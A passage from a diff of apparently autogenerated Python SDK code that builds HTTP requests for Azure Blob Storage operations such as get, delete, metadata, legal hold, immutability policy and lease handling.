kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + range_get_content_md5 = kwargs.pop('range_get_content_md5', None) # type: Optional[bool] + range_get_content_crc64 = kwargs.pop('range_get_content_crc64', None) # type: Optional[bool] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if range_get_content_md5 is not None: + _header_parameters['x-ms-range-get-content-md5'] = _SERIALIZER.header("range_get_content_md5", range_get_content_md5, 'bool') + if range_get_content_crc64 is not None: + _header_parameters['x-ms-range-get-content-crc64'] = _SERIALIZER.header("range_get_content_crc64", range_get_content_crc64, 'bool') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="HEAD", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_delete_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + delete_snapshots = kwargs.pop('delete_snapshots', None) # type: Optional[Union[str, "_models.DeleteSnapshotsOptionType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_delete_type = kwargs.pop('blob_delete_type', "Permanent") # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if blob_delete_type is not None: + _query_parameters['deletetype'] = _SERIALIZER.query("blob_delete_type", blob_delete_type, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if delete_snapshots is not None: + _header_parameters['x-ms-delete-snapshots'] = _SERIALIZER.header("delete_snapshots", delete_snapshots, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="DELETE", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_undelete_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "undelete") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_expiry_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "expiry") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + expiry_options = kwargs.pop('expiry_options') # type: Union[str, "_models.BlobExpiryOptions"] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + expires_on = kwargs.pop('expires_on', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['x-ms-expiry-option'] = _SERIALIZER.header("expiry_options", expiry_options, 'str') + if expires_on is not None: + _header_parameters['x-ms-expiry-time'] = _SERIALIZER.header("expires_on", expires_on, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_http_headers_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_immutability_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_delete_immutability_policy_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="DELETE", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_legal_hold_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "legalhold") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + legal_hold = kwargs.pop('legal_hold') # type: bool + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_metadata_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "metadata") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_acquire_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "acquire") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + duration = kwargs.pop('duration', None) # type: Optional[int] + proposed_lease_id = kwargs.pop('proposed_lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if duration is not None: + _header_parameters['x-ms-lease-duration'] = _SERIALIZER.header("duration", duration, 'int') + if proposed_lease_id is not None: + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_release_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "release") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_renew_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + 